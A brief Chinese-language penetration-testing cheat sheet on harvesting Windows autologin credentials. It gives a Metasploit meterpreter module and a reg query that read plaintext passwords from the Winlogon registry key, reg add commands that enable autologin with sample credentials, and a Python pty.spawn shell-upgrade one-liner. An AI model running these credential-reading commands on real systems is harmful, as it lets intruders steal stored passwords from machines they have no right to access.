自动登录凭据获取
如果把某个用户设置成自动登录,则可以抓取自动登录的用户名和密码
使用msf模块从注册表中获取明文密码
1
| meterpreter > run post/windows/gather/credentials/windows_autologin
|
直接读取注册表获取明文密码
1
| reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
|
设置用户自动登录
1
2
3
4
| reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d "tt" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d "Qwer1234" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /t REG_SZ /d "xx.com" /f
|
伪终端
一方面便于操作,另一方面没有完整tty不能执行某些命令
1
| python -c 'import pty; pty.spawn("/bin/bash")'
|